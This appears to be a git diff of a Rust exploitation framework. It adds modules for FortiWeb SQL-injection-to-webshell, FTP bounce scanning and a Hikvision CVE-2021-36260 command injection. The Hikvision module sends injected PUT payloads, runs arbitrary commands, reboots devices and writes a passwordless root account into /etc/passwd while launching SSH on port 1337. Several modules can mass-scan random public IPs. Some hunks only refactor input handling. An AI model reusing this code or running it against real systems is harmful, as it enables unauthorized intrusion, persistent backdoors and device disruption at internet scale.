if target == "0.0.0.0" || target == "0.0.0.0/0" || target.is_empty() || target == "random" {
run_mass_scan().await
} else {
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
let exploit = FortiWebExploit::new(target)?;
println!("{}", "[*] Select operation:".cyan());
println!(" {} Deploy webshell (full exploit chain)", "1.".bold());
println!(" {} Execute command (if webshell already deployed)", "2.".bold());
println!(" {} Test SQL injection only", "3.".bold());
println!();
let choice = prompt_input_std("Select option [1-3]: ")?;
match choice.as_str() {
"1" => {
println!();
println!(
"{}",
"[!] WARNING: This will write files to the target system!".yellow().bold()
);
let confirm = prompt_input_std("Continue? [y/N]: ")?;
if !confirm.eq_ignore_ascii_case("y") {
println!("{}", "[-] Operation cancelled.".red());
return Ok(());
}
println!();
println!("{}", "[*] Starting exploit chain...".cyan());
if exploit.upload_webshell().await? {
println!("{}", "[+] Webshell deployed successfully!".green().bold());
// Run initial 'id' command to verify
let output = exploit.run_cmd("id").await?;
println!("{}", "[+] Initial command output (id):".green());
println!("{}", output);
println!();
println!("{}", "[+] Webshell URL:".green().bold());
println!(" -> {}", exploit.get_webshell_url());
println!(" -> Send commands via User-Agent header");
// Interactive command loop
println!();
let interactive = prompt_input_std("Enter interactive mode? [y/N]: ")?;
if interactive.eq_ignore_ascii_case("y") {
loop {
let cmd = prompt_input_std("cmd> ")?;
if cmd.is_empty() || cmd == "exit" || cmd == "quit" {
break;
}
match exploit.run_cmd(&cmd).await {
Ok(out) => println!("{}", out),
Err(e) => println!("{}", format!("[!] Error: {}", e).red()),
}
}
}
} else {
println!("{}", "[-] Exploit may have failed.".red());
}
}
"2" => {
// Direct command execution (assumes webshell already deployed)
println!();
let cmd = prompt_input_std("Enter command to execute: ")?;
if cmd.is_empty() {
return Err(anyhow!("Command cannot be empty"));
}
match exploit.run_cmd(&cmd).await {
Ok(output) => {
println!("{}", "[+] Command output:".green());
println!("{}", output);
}
Err(e) => {
println!(
"{}",
format!("[-] Command execution failed: {}", e).red()
);
}
}
}
"3" => {
// Test SQL injection only
println!();
println!("{}", "[*] Testing SQL injection...".cyan());
let test_injection = "SELECT/**/1;--";
match exploit.inject_sql(test_injection).await {
Ok(true) => {
println!(
"{}",
"[+] SQL injection successful! Target appears vulnerable.".green().bold()
);
}
Ok(false) => {
println!(
"{}",
"[-] SQL injection test failed. Target may not be vulnerable.".red()
);
}
Err(e) => {
println!("{}", format!("[-] Test failed: {}", e).red());
}
}
}
_ => {
println!("{}", "[-] Invalid option".red());
}
}
println!();
println!(
"{}",
"[!] REMINDER: This is for authorized testing only.".yellow()
);
Ok(())
}
}
+5
View File
@@ -0,0 +1,5 @@
pub mod fortios_auth_bypass_cve_2022_40684;
pub mod fortios_ssl_vpn_cve_2018_13379;
pub mod fortiweb_rce_cve_2021_22123;
pub mod fortiweb_sqli_rce_cve_2025_25257;
pub mod fortisiem_rce_cve_2025_64155;
+266
View File
@@ -0,0 +1,266 @@
use anyhow::{anyhow, Result};
use colored::*;
use suppaftp::tokio::AsyncFtpStream;
use suppaftp::Status;
use std::time::Duration;
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio::sync::Semaphore;
use tokio::fs::OpenOptions;
use tokio::io::AsyncWriteExt;
use tokio::time::timeout;
use regex::Regex;
use crate::utils::{
prompt_existing_file, prompt_default, prompt_int_range,
load_lines
};
const DEFAULT_TIMEOUT_SECS: u64 = 8;
const CONNECT_TIMEOUT_MS: u64 = 4000;
struct FtpCreds {
ip: String,
port: u16,
user: String,
pass: String,
}
pub async fn run(target: &str) -> Result<()> {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FTP Bounce Vulnerability Scanner ║".cyan());
println!("{}", "║ Tests for PORT command abuse (External/Internal) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
// Interactive Mode Check
let effective_target = if target.is_empty() || target == "interactive" || target == "load" {
println!("{}", "[*] Interactive Mode".cyan());
println!("[1] Load targets from file (supporting 'IP:PORT:USER:PASS')");
println!("[2] Scan single target");
let choice = prompt_int_range("Select mode", 1, 1, 2)?;
if choice == 1 {
let f = prompt_existing_file("Path to credentials file")?;
f
} else {
let t = prompt_default("Target (IP:PORT or IP:PORT:USER:PASS)", "")?;
t
}
} else {
target.to_string()
};
// Check if target is a file or single target
let targets = if std::path::Path::new(&effective_target).is_file() {
println!("{}", format!("[!] Parsing file '{}'", effective_target).yellow());
parse_ftp_results(&effective_target).await?
} else {
// Single target handling
parse_single_target(&effective_target)?
};
if targets.is_empty() {
return Err(anyhow!("No valid targets found."));
}
println!("{}", format!("[*] Loaded {} credential/target sets.", targets.len()).green());
let concurrency = prompt_int_range("Max concurrent checks", 50, 1, 500)? as usize;
let output_file = prompt_default("Output file for vulnerabilities", "ftp_bounce_results.txt")?;
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_vuln = Arc::new(AtomicUsize::new(0));
let total = targets.len();
// Stats loop
let s_checked = stats_checked.clone();
let s_vuln = stats_vuln.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(3)).await;
let checked = s_checked.load(Ordering::Relaxed);
let vuln = s_vuln.load(Ordering::Relaxed);
println!(
"[*] Progress: {}/{} checked, {} Vulnerable found",
checked, total, vuln.to_string().red().bold()
);
if checked >= total { break; }
}
});
// Run Scans
let mut tasks = Vec::new();
for target_creds in targets {
// Safe permit acquisition
let permit = match semaphore.clone().acquire_owned().await {
Ok(p) => p,
Err(_) => break, // Check if semaphore closed
};
let sc = stats_checked.clone();
let sv = stats_vuln.clone();
let of = output_file.clone();
tasks.push(tokio::spawn(async move {
if check_bounce_vulnerability(&target_creds, &of).await {
sv.fetch_add(1, Ordering::Relaxed);
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
}));
}
// Wait all
for t in tasks {
let _ = t.await;
}
println!("\n{}", "[*] Scan Completed.".green().bold());
println!("[+] Results saved to {}", output_file.cyan());
Ok(())
}
fn parse_single_target(raw: &str) -> Result<Vec<FtpCreds>> {
// Attempt parse as "IP:PORT:USER:PASS"
// Regex matches 4 groups separated by colons
let re_full = Regex::new(r"^([^:]+):(\d+):([^:]+):(.*)$").map_err(|e| anyhow!("Regex error: {}", e))?;
if let Some(caps) = re_full.captures(raw) {
let ip = caps.get(1).map_or("", |m| m.as_str()).to_string();
let port = caps.get(2).map_or("21", |m| m.as_str()).parse().unwrap_or(21);
let user = caps.get(3).map_or("", |m| m.as_str()).to_string();
let pass = caps.get(4).map_or("", |m| m.as_str()).to_string();
return Ok(vec![FtpCreds { ip, port, user, pass }]);
}
// Fallback: Just IP or IP:PORT, assumes anonymous
let (ip, port) = if raw.matches(':').count() == 1 {
let parts: Vec<&str> = raw.split(':').collect();
let p_val = parts.get(1).unwrap_or(&"21").parse().unwrap_or(21);
(parts[0].to_string(), p_val)
} else if !raw.contains(':') {
(raw.to_string(), 21)
} else {
// Ambiguous format, possibly IPv6? Ignore for now or treat as string
(raw.to_string(), 21)
};
// If it *looks* like an IP, return default creds
if !ip.is_empty() {
return Ok(vec![FtpCreds { ip, port, user: "anonymous".to_string(), pass: "anonymous".to_string() }]);
}
Err(anyhow!("Invalid target format. Expected IP:PORT:USER:PASS or IP/IP:PORT"))
}
async fn parse_ftp_results(path: &str) -> Result<Vec<FtpCreds>> {
let lines = load_lines(path)?;
let mut creds = Vec::new();
// Standard Format: IP:PORT:USER:PASS
let re_std = Regex::new(r"^([^:]+):(\d+):([^:]+):(.*)$").map_err(|e| anyhow!("Regex error: {}", e))?;
// Legacy/Old formats support (optional but good for transitions)
// IP:PORT [ANONYMOUS...]
let re_anon_old = Regex::new(r"^([^:]+):(\d+)\s+\[ANONYMOUS").map_err(|e| anyhow!("Regex error: {}", e))?;
for line in lines {
if let Some(caps) = re_std.captures(&line) {
let ip = caps.get(1).map_or("", |m| m.as_str()).to_string();
let port = caps.get(2).map_or("21", |m| m.as_str()).parse().unwrap_or(21);
let user = caps.get(3).map_or("", |m| m.as_str()).to_string();
let pass = caps.get(4).map_or("", |m| m.as_str()).to_string();
creds.push(FtpCreds { ip, port, user, pass });
} else if let Some(caps) = re_anon_old.captures(&line) {
let ip = caps.get(1).map_or("", |m| m.as_str()).to_string();
let port = caps.get(2).map_or("21", |m| m.as_str()).parse().unwrap_or(21);
creds.push(FtpCreds { ip, port, user: "anonymous".to_string(), pass: "anonymous".to_string() });
}
}
Ok(creds)
}
async fn check_bounce_vulnerability(creds: &FtpCreds, output_file: &str) -> bool {
let addr = format!("{}:{}", creds.ip, creds.port);
// Connect
let mut ftp = match timeout(Duration::from_millis(CONNECT_TIMEOUT_MS), AsyncFtpStream::connect(&addr)).await {
Ok(Ok(f)) => f,
_ => return false,
};
// Login
if ftp.login(&creds.user, &creds.pass).await.is_err() {
return false;
}
// Set Checks
let mut is_vuln = false;
let mut ext_vuln = false;
let mut int_vuln = false;
// Test 1: External Bounce (Google DNS 8.8.8.8:53)
// PORT command format: h1,h2,h3,h4,p1,p2
let ext_test = "PORT 8,8,8,8,0,53";
match timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS), ftp.custom_command(ext_test, &[Status::CommandOk])).await {
Ok(Ok(resp)) => {
// Check for 200 OK
if (resp.status as u32) == 200 {
ext_vuln = true;
is_vuln = true;
}
},
_ => {}
}
// Test 2: Internal Bounce (Common Gateways)
// 192.168.1.1:80 => 192,168,1,1,0,80
// 10.0.0.1:80 => 10,0,0,1,0,80
// We try a few. If ANY work, we flag it.
let int_tests = vec![
"PORT 192,168,1,1,0,80",
"PORT 10,0,0,1,0,80",
"PORT 172,16,0,1,0,80",
"PORT 127,0,0,1,0,22" // Bounce to self?
];
for cmd in int_tests {
if timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS), ftp.custom_command(cmd, &[Status::CommandOk])).await
.ok()
.and_then(|r| r.ok())
.map(|r| (r.status as u32) == 200)
.unwrap_or(false)
{
int_vuln = true;
is_vuln = true;
break;
}
}
let _ = ftp.quit().await;
if is_vuln {
let msg = format!(
"{} -> {}:{} [VULNERABLE] [Ext Bounce: {}] [Int Bounce: {}]",
addr, creds.user, creds.pass,
if ext_vuln { "YES".red().bold() } else { "NO".dimmed() },
if int_vuln { "YES".red().bold() } else { "NO".dimmed() }
);
println!("\r[+] Found: {}", msg);
let file_log = format!("{} -> {}:{} [VULNERABLE] [Ext Bounce: {}] [Int Bounce: {}]\n",
addr, creds.user, creds.pass,
if ext_vuln { "YES" } else { "NO" },
if int_vuln { "YES" } else { "NO" });
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(output_file).await {
let _ = file.write_all(file_log.as_bytes()).await;
}
}
is_vuln
}
+1
View File
@@ -1 +1,2 @@
pub mod pachev_ftp_path_traversal_1_0;
pub mod ftp_bounce_test;
@@ -9,7 +9,7 @@ use futures::stream::{FuturesUnordered, StreamExt};
use colored::*; // // Colorful output
use std::time::Duration;
use tokio::time::timeout;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
const MAX_CONCURRENT_TASKS: usize = 10; // // Limit concurrent scanning
const FTP_TIMEOUT_SECONDS: u64 = 10; // // Timeout per FTP connection
@@ -81,14 +81,12 @@ pub async fn run(target: &str) -> Result<()> {
let target = target.to_string(); // // Own target early to avoid lifetime issues
print!("{}", "Enter the FTP port (default 21): ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut port_input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut port_input)
.await
.context("Failed to read port")?;
let port_input = port_input.trim();
let port = if port_input.is_empty() {
@@ -98,27 +96,23 @@ pub async fn run(target: &str) -> Result<()> {
};
print!("{}", "Do you want to use a list of IPs? (yes/no): ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut use_list = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut use_list)
.await
.context("Failed to read list choice")?;
let use_list = use_list.trim().to_lowercase();
if use_list == "yes" || use_list == "y" {
print!("{}", "Enter path to the IP list file: ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut path = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut path)
.await
.context("Failed to read file path")?;
let path = path.trim();
+11 -21
View File
@@ -4,7 +4,7 @@ use std::io::{BufRead, BufReader, Write};
use std::net::ToSocketAddrs;
use std::path::Path;
use std::time::{SystemTime, UNIX_EPOCH};
use tokio::io::{AsyncReadExt, AsyncWriteExt, AsyncBufReadExt};
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio::net::TcpStream;
use tokio::time::{timeout, Duration, sleep};
use regex::Regex;
@@ -49,14 +49,12 @@ async fn get_user_config(target: &str) -> Result<ScanConfig> {
println!();
print!("{}", format!("Enter target port [default: {}]: ", config.port).green());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read port input")?;
if let Ok(port) = input.trim().parse::<u16>() {
if port > 0 {
@@ -65,14 +63,12 @@ async fn get_user_config(target: &str) -> Result<ScanConfig> {
}
print!("{}", format!("Enter payload size in bytes [default: {} (16KB)]: ", config.payload_size).green());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
input.clear();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read payload size input")?;
if let Ok(size) = input.trim().parse::<u16>() {
if size > 0 && size <= 0x4000 {
@@ -84,14 +80,12 @@ async fn get_user_config(target: &str) -> Result<ScanConfig> {
}
print!("{}", format!("Enter number of heartbeat attempts [default: {}]: ", config.heartbeat_attempts).green());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
input.clear();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read heartbeat attempts input")?;
if let Ok(attempts) = input.trim().parse::<usize>() {
if attempts > 0 && attempts <= 20 {
@@ -104,26 +98,22 @@ async fn get_user_config(target: &str) -> Result<ScanConfig> {
if target.is_empty() {
print!("{}", "Use batch mode? (scan multiple targets from file) [y/N]: ".green());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
input.clear();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read batch mode input")?;
if input.trim().eq_ignore_ascii_case("y") || input.trim().eq_ignore_ascii_case("yes") {
print!("{}", "Enter batch file path: ".green());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
input.clear();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read batch file path input")?;
let batch_file = input.trim().to_string();
@@ -0,0 +1,508 @@
use anyhow::{anyhow, Context, Result};
use colored::*;
use rand::Rng;
use reqwest::Client;
use std::io::{self, Write};
use std::net::{IpAddr, Ipv4Addr};
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use std::time::Duration;
use tokio::sync::Semaphore;
use tokio::sync::mpsc;
use tokio::fs::OpenOptions;
use tokio::io::AsyncWriteExt;
use chrono::Local;
const DEFAULT_TIMEOUT_SECS: u64 = 10;
const MAX_CMD_LENGTH: usize = 22;
const MASS_SCAN_CONCURRENCY: usize = 100;
const MASS_SCAN_PORT: u16 = 80;
// Bogon/Private/Reserved exclusion ranges
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32", "8.8.8.8/32", "8.8.4.4/32",
];
#[derive(Clone, Copy, Debug)]
enum ScanMode {
SafeCheck,
UnsafeReboot,
CustomCommand,
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
if !exclusions.iter().any(|net| net.contains(ip_addr)) {
return ip_addr;
}
}
}
/// Display module banner
fn display_banner() {
println!(
"{}",
"╔═══════════════════════════════════════════════════════════╗".cyan()
);
println!(
"{}",
"║ Hikvision Web Server CVE-2021-36260 ║".cyan()
);
println!(
"{}",
"║ Unauthenticated Command Injection (Build 210702) ║".cyan()
);
println!(
"{}",
"║ PoC by bashis - Ported to Rust for rustsploit ║".cyan()
);
println!(
"{}",
"╚═══════════════════════════════════════════════════════════╝".cyan()
);
}
/// Normalize target URL
fn normalize_target(raw: &str) -> String {
let (scheme, after) = if let Some(s) = raw.strip_prefix("http://") {
("http://", s)
} else if let Some(s) = raw.strip_prefix("https://") {
("https://", s)
} else {
("http://", raw)
};
let (auth, path) = match after.find('/') {
Some(i) => (&after[..i], &after[i..]),
None => (after, ""),
};
let (host_part, port_part) = if auth.starts_with('[') {
if let Some(pos) = auth.rfind(']') {
(&auth[..=pos], &auth[pos + 1..])
} else {
(auth, "")
}
} else if auth.matches(':').count() > 1 {
(auth, "") // IPv6 without brackets
} else if let Some(pos) = auth.rfind(':') {
(&auth[..pos], &auth[pos..])
} else {
(auth, "")
};
let mut inner = host_part;
while inner.starts_with('[') && inner.ends_with(']') {
inner = &inner[1..inner.len() - 1];
}
let wrapped = if inner.contains(':') {
format!("[{}]", inner)
} else {
inner.to_string()
};
format!("{}{}{}{}", scheme, wrapped, port_part, path)
}
/// HTTP client wrapper for Hikvision exploitation
struct HikvisionClient {
client: Client,
base_url: String,
}
impl HikvisionClient {
fn new(target: &str, proto: &str, timeout: u64) -> Result<Self> {
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(timeout))
.build()
.context("Failed to build HTTP client")?;
let base_url = format!("{}://{}", proto, target);
let base_url = normalize_target(&base_url);
Ok(Self { client, base_url })
}
/// Send PUT request with command injection payload
async fn send_payload(&self, command: &str, timeout: u64) -> Result<reqwest::Response> {
if command.len() > MAX_CMD_LENGTH {
return Err(anyhow!(
"Command '{}' is too long ({} chars, max {})",
command,
command.len(),
MAX_CMD_LENGTH
));
}
let payload = format!(
"<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$({})</language>",
command
);
self.client
.put(format!("{}/SDK/webLanguage", self.base_url))
.header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
.header("X-Requested-With", "XMLHttpRequest")
.body(payload)
.timeout(Duration::from_secs(timeout))
.send()
.await
.context("Failed to send payload")
}
/// Send GET request
async fn get(&self, path: &str, timeout: u64) -> Result<reqwest::Response> {
self.client
.get(format!("{}{}", self.base_url, path))
.timeout(Duration::from_secs(timeout))
.send()
.await
.context("Failed to send GET request")
}
}
async fn check_vulnerable(client: &HikvisionClient, noverify: bool) -> Result<bool> {
if noverify {
return Ok(true);
}
// First check if we can connect
match client.get("/", 5).await {
Ok(_) => {},
Err(_) => return Ok(false),
}
// Try to write a test file
match client.send_payload(">webLib/c", 5).await {
Ok(resp) => {
if resp.status().as_u16() == 404 { return Ok(false); }
// Try to read the file we created
match client.get("/c", 5).await {
Ok(read_resp) => {
if read_resp.status().as_u16() == 200 { return Ok(true); }
Ok(false)
}
Err(_) => Ok(false),
}
}
Err(_) => Ok(false),
}
}
async fn check_with_reboot(client: &HikvisionClient) -> Result<bool> {
let _ = client.send_payload("reboot", 5).await;
tokio::time::sleep(Duration::from_secs(2)).await;
match client.get("/", 5).await {
Ok(_) => Ok(false), // Still responding
Err(_) => Ok(true), // Device went down/rebooted
}
}
async fn execute_cmd(client: &HikvisionClient, command: &str) -> Result<String> {
let write_cmd = format!("{}>webLib/x", command);
if write_cmd.len() > MAX_CMD_LENGTH {
return Err(anyhow!("Command too long"));
}
client.send_payload(&write_cmd, 10).await?;
let resp = client.get("/x", 10).await?;
if resp.status().as_u16() != 200 {
return Err(anyhow!("Failed to retrieve command output"));
}
Ok(resp.text().await.unwrap_or_default())
}
async fn execute_blind_cmd(client: &HikvisionClient, command: &str) -> Result<()> {
match client.send_payload(command, 10).await {
Ok(resp) => {
if resp.status().as_u16() == 500 { Ok(()) } else { Err(anyhow!("Unexpected code")) }
}
Err(e) => Err(anyhow!("Failed: {}", e)),
}
}
async fn interactive_shell(client: &HikvisionClient) -> Result<()> {
println!("{}", "[*] Preparing shell access...".cyan());
match client.get("/N", 5).await {
Ok(resp) => {
if resp.status().as_u16() == 404 {
client.send_payload("echo -n P::0:0:W>N", 10).await?;
client.send_payload("echo :/:/bin/sh>>N", 10).await?;
client.send_payload("cat N>>/etc/passwd", 10).await?;
client.send_payload("dropbear -R -B -p 1337", 10).await?;
client.send_payload("cat N>webLib/N", 10).await?;
println!("{}", "[+] Dropbear SSH started on port 1337".green());
}
}
Err(_) => return Err(anyhow!("Failed to check shell status")),
}
println!("{}", "[*] SSH connection ready".cyan());
Ok(())
}
async fn interactive_mode(client: &HikvisionClient) -> Result<()> {
println!("{}", "\n[*] Entering interactive command mode".cyan());
loop {
print!("{}", "hikvision> ".green().bold());
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let cmd = input.trim();
if cmd.is_empty() { continue; }
if cmd == "exit" || cmd == "quit" { break; }
match execute_cmd(client, cmd).await {
Ok(output) => println!("{}", output),
Err(e) => println!("{}", format!("[-] Error: {}", e).red()),
}
}
Ok(())
}
/// Quick vulnerability check for mass scanning
async fn quick_check(ip: &str, mode: ScanMode, custom_payload: &str) -> bool {
let host_port = format!("{}:{}", ip, MASS_SCAN_PORT);
if let Ok(client) = HikvisionClient::new(&host_port, "http", 5) {
match mode {
ScanMode::SafeCheck => {
check_vulnerable(&client, false).await.unwrap_or(false)
},
ScanMode::UnsafeReboot => {
check_with_reboot(&client).await.unwrap_or(false)
},
ScanMode::CustomCommand => {
// Just execute validation blind command
match client.send_payload(custom_payload, 5).await {
Ok(resp) => resp.status().as_u16() == 200 || resp.status().as_u16() == 500,
Err(_) => false,
}
}
}
} else {
false
}
}
/// Mass scan mode
async fn run_mass_scan() -> Result<()> {
display_banner();
println!("{}", "[*] Mass Scan Mode: 0.0.0.0/0".yellow().bold());
println!("{}", "[*] Honeypot detection: DISABLED".yellow());
println!("{}", format!("[*] Concurrency: {}", MASS_SCAN_CONCURRENCY).cyan());
// Prompt for exclusions
print!("{}", "[?] Exclude reserved/private ranges? [Y/n]: ".cyan());
io::stdout().flush()?;
let mut excl_choice = String::new();
io::stdin().read_line(&mut excl_choice)?;
let use_exclusions = !matches!(excl_choice.trim().to_lowercase().as_str(), "n" | "no");
let mut exclusions = Vec::new();
if use_exclusions {
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusions.push(net);
}
}
}
let exclusions = Arc::new(exclusions);
// Prompt for Output File
print!("{}", "[?] Output File (default: hikvision_hits.txt): ".cyan());
io::stdout().flush()?;
let mut outfile = String::new();
io::stdin().read_line(&mut outfile)?;
let outfile = outfile.trim();
let outfile = if outfile.is_empty() { "hikvision_hits.txt" } else { outfile };
let outfile = outfile.to_string();
// Prompt for Payload Mode
println!("{}", "[?] Select Payload Mode:".cyan());
println!(" 1. Safe Check (File Write/Read)");
println!(" 2. Unsafe Check (Reboot Device)");
println!(" 3. Custom Command");
print!("{}", "Select option [1-3] (default 1): ".cyan());
io::stdout().flush()?;
let mut mode_str = String::new();
io::stdin().read_line(&mut mode_str)?;
let mode = match mode_str.trim() {
"2" => ScanMode::UnsafeReboot,
"3" => ScanMode::CustomCommand,
_ => ScanMode::SafeCheck,
};
let mut custom_payload = String::new();
if let ScanMode::CustomCommand = mode {
print!("{}", "[?] Enter Custom Command (max 22 chars): ".cyan());
io::stdout().flush()?;
io::stdin().read_line(&mut custom_payload)?;
custom_payload = custom_payload.trim().to_string();
}
let custom_payload = Arc::new(custom_payload);
let semaphore = Arc::new(Semaphore::new(MASS_SCAN_CONCURRENCY));
let checked = Arc::new(AtomicUsize::new(0));
let found = Arc::new(AtomicUsize::new(0));
// Result writer channel
let (tx, mut rx) = mpsc::unbounded_channel::<String>();
// Writer task
let outfile_clone = outfile.clone();
tokio::spawn(async move {
let mut file = OpenOptions::new()
.create(true)
.append(true)
.open(&outfile_clone)
.await
.expect("Failed to open output file");
while let Some(result) = rx.recv().await {
if let Err(e) = file.write_all(result.as_bytes()).await {
eprintln!("[-] Failed to write result: {}", e);
}
}
});
let c = checked.clone();
let f = found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(10)).await;
println!("[*] Checked: {} | Found: {}", c.load(Ordering::Relaxed), f.load(Ordering::Relaxed));
}
});
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let chk = checked.clone();
let fnd = found.clone();
let tx = tx.clone();
let cp = custom_payload.clone();
let current_mode = mode; // Copy
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
let ip_str = ip.to_string();
if quick_check(&ip_str, current_mode, &cp).await {
println!("{}", format!("[+] VULNERABLE: {}", ip_str).green().bold());
fnd.fetch_add(1, Ordering::Relaxed);
let timestamp = Local::now().format("%Y-%m-%d %H:%M:%S").to_string();
let log_entry = format!("{} - {}\n", ip_str, timestamp);
let _ = tx.send(log_entry);
}
chk.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
}
pub async fn run(target: &str) -> Result<()> {
if target == "0.0.0.0" || target == "0.0.0.0/0" || target.is_empty() || target == "random" {
run_mass_scan().await
} else {
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
// Parse target to extract host:port and protocol
let (proto, host_port) = if target.starts_with("https://") {
("https", target.strip_prefix("https://").unwrap_or(target))
} else if target.starts_with("http://") {
("http", target.strip_prefix("http://").unwrap_or(target))
} else {
("http", target)
};
let host_port = host_port.split('/').next().unwrap_or(host_port);
println!("{}", "[*] Select operation mode:".cyan());
println!(" {} Check if vulnerable (safe)", "1.".bold());
println!(" {} Check with reboot (unsafe)", "2.".bold());
println!(" {} Execute single command", "3.".bold());
println!(" {} Execute blind command", "4.".bold());
println!(" {} Interactive shell mode", "5.".bold());
println!(" {} Setup SSH shell (dropbear)", "6.".bold());
println!();
print!("{}", "Select option [1-6]: ".green());
io::stdout().flush()?;
let mut choice = String::new();
io::stdin().read_line(&mut choice)?;
let choice = choice.trim();
let client = HikvisionClient::new(host_port, proto, DEFAULT_TIMEOUT_SECS)?;
match choice {
"1" => { check_vulnerable(&client, false).await?; }
"2" => {
println!();
print!("{}", "[!] This will reboot the device. Continue? [y/N]: ".red());
io::stdout().flush()?;
let mut confirm = String::new();
io::stdin().read_line(&mut confirm)?;
if confirm.trim().eq_ignore_ascii_case("y") {
check_with_reboot(&client).await?;
} else {
println!("{}", "[*] Aborted".yellow());
}
}
"3" => {
if !check_vulnerable(&client, false).await? { return Err(anyhow!("Target is not vulnerable")); }
println!();
print!("{}", "Enter command to execute: ".green());
io::stdout().flush()?;
let mut cmd = String::new();
io::stdin().read_line(&mut cmd)?;
let cmd = cmd.trim();
if !cmd.is_empty() {
match execute_cmd(&client, cmd).await {
Ok(output) => {
println!("{}", "\n[+] Command output:".green());
println!("{}", output);
}
Err(e) => println!("{}", format!("[-] Error: {}", e).red()),
}
}
}
"4" => {
if !check_vulnerable(&client, false).await? { return Err(anyhow!("Target is not vulnerable")); }
println!();
print!("{}", "Enter blind command to execute: ".green());
io::stdout().flush()?;
let mut cmd = String::new();
io::stdin().read_line(&mut cmd)?;
let cmd = cmd.trim();
if !cmd.is_empty() { execute_blind_cmd(&client, cmd).await?; }
}
"5" => {
if !check_vulnerable(&client, false).await? { return Err(anyhow!("Target is not vulnerable")); }
interactive_mode(&client).await?;
}
"6" => {
if !check_vulnerable(&client, false).await? { return Err(anyhow!("Target is not vulnerable")); }
interactive_shell(&client).await?;
}
_ => println!("{}", "[-] Invalid option".red()),
}
println!();
println!("{}", "[*] Exploitation complete".cyan());
Ok(())
}
}
+1
View File
@@ -0,0 +1 @@
pub mod hikvision_rce_cve_2021_36260;
@@ -20,7 +20,7 @@
//! 3. Vulnerability analysis based on reset rates
//!
//! ## Security Notes
//! - Proper IPv6 address handling
//! - Proper IPv6 address handling via utils.rs normalize_target
//! - Timeout handling for all network operations
//! - Connection cleanup and resource management
//! - Error handling with context
@@ -35,12 +35,16 @@ use anyhow::{anyhow, Context, Result};
use colored::*;
use h2::client::Builder;
use h2::Reason;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::net::ToSocketAddrs;
use std::time::{Duration, Instant};
use tokio::net::TcpStream;
use tokio::time::timeout;
use tokio_rustls::TlsConnector;
use rustls::pki_types::ServerName;
use crate::utils::{
normalize_target, prompt_yes_no, prompt_int_range,
};
/// Displays module banner
fn banner() {
@@ -59,44 +63,41 @@ fn banner() {
);
}
/// Parse target and extract host and port, handling IPv6 correctly
/// Parse and validate target using utils.rs normalize_target
/// Returns (host, port) tuple with proper IPv6 handling
